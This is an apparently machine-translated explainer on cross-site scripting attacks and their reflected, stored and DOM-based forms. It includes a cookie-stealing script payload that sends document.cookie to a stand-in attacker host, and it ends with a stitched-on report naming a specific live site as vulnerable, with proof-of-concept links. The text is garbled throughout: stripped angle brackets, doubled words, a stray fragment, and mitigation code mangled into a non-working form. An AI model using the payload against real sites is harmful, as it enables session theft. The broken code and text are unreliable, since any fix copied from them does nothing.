Cross-Site Scripting or XSS. Cross-Site Scripting (cross-site scripting).
The passed code is executed in the security context (or security zone) of the vulnerable server. Using these privileges, the code is able to read, modify or transfer sensitive data accessible from the browser. The attacked user’s account can be compromised (cookie theft), browser can be redirected to another server or server content can be spoofed. In a carefully crafted attack the attacker may use the victim’s browser to browse the site on behalf of the attacked user. The code can be passed by the attacker in the URL, in HTTP request headers (cookie, user-agent, refferer), form field values, etc.
There are three types of cross-site scripting attacks: non-persistent non-persistent, persistent persistent, and DOM-based. The main difference between persistent and non-persistent is that in the reflected variant, code transmission to the server and its return to the client is done within a single HTTP request, while in the stored variant it is done in different ones.
Performing a non-permanent attack requires the user to follow a link generated by the attacker (the link can be transmitted via email, ICQ, etc.). While the site is loading, the code embedded in the URL or request headers will be passed to the client and executed in their browser.
A stored vulnerability occurs when code is transmitted to a server and stored on it for some period of time. The most popular targets in this case are forums, Webmail and chat rooms. The user doesn’t have to click on the link in order to be attacked, just visit the vulnerable site.
SCRIPTdocument.location=https://attackerhost.example/cgi bin/cookiesteal.cgi? document.cookie/SCRIPT
can be used to hide the script code
scriptvar name=decodeURIComponent(window.location.search.substring(6))||; document.write(Привет name);/script
The second line of the script calls window.location.search.substring method, which extracts the part of the address string starting with ?. Then, using the document.write() method, the dynamically generated content of the document is added. This script assumes that the web page will be accessed with URL like this:
https://www.example.com/greet.html?name=Давид In this case the text “Hi David” will be displayed. But what happens if the page is requested using the following URL:
.https://www.example.com/greet.html?na) With this URL content, the script will dynamically generate another script (the codes are angle brackets)! In this case, the pasted script will simply display a dialog box which poses no threat. But imagine this case:
[DATAENCODE Cross-site scripting is so called because more than one site is involved in the attack. Site B (or even site C) includes a specially constructed link (similar to the one just shown) to site A, which contains a script from site B. The evil.js script is placed on the attacker’s site B, but now this script ends up embedded in site A and can do whatever it wants with the content of site A. It can erase the page or cause other disruptions to the site (such as denial of service, as discussed in the next section). This can have a negative impact on the visitors to site A. More dangerously, such a malicious script could read the contents of cookies stored on site A (possibly containing account numbers or other personal information) and send that data back to site B. The embedded script could even track keystrokes and send that data back to site B.
A universal way to prevent XS attacks is to remove HTML tags from all data of questionable origin before using them to dynamically create document content. To fix this problem in the greet.html file shown earlier, you need to add the following line to the script, which is designed to remove the angle brackets surrounding the script tag:
name=name.replace(//g,lt;).replace(//g,gt;); Cross-site scripting is a vulnerability deeply rooted in the architecture of the World Wide Web. The depth of this vulnerability needs to be understood.
vulnerable site: https://dumps.pw vulnerable link: https://dumps.pw/check.php POC: https://i.imgur.com/3DJQMAY.jpg https://i.imgur.com/xKMtZh6.jpg
tests in the Mozilla Firefox browser https://dumps.pw/check.php?check=